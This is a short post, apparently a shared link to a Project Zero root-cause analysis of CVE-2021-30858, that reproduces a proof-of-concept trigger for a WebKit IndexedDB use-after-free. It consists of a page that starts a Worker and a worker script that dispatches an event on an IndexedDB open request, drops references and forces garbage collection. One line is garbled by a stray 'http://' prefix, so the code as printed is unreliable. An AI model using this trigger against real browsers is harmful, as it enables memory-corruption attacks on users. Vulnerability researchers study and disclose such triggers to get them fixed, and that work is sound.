Apple's IndexDB Has A Tweetable Exploit

Posted on 2022-01-26: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-30858.html

index.html:
<script>w = new Worker('idbworker.js');</script>

idbworker.js:
function gc() {
   for (var i = 0; i < 1000; i++) { a = new Uint8Array(1024*1024); }
}

let ev = new Event('mine');
let req = http://indexedDB.open('db');
req.dispatchEvent(ev);
req = 0;
ev = 0;
gc();